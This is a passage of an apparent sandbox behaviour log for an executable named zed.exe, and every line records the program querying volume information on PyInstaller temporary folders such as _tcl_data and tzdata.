Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\opt0.4 VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata\Africa VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata\Africa VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata\Africa VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata\Africa VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata\Africa VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata\Africa VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata\Africa VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata\Africa VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata\Africa VolumeInformationJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformationJump to behavior
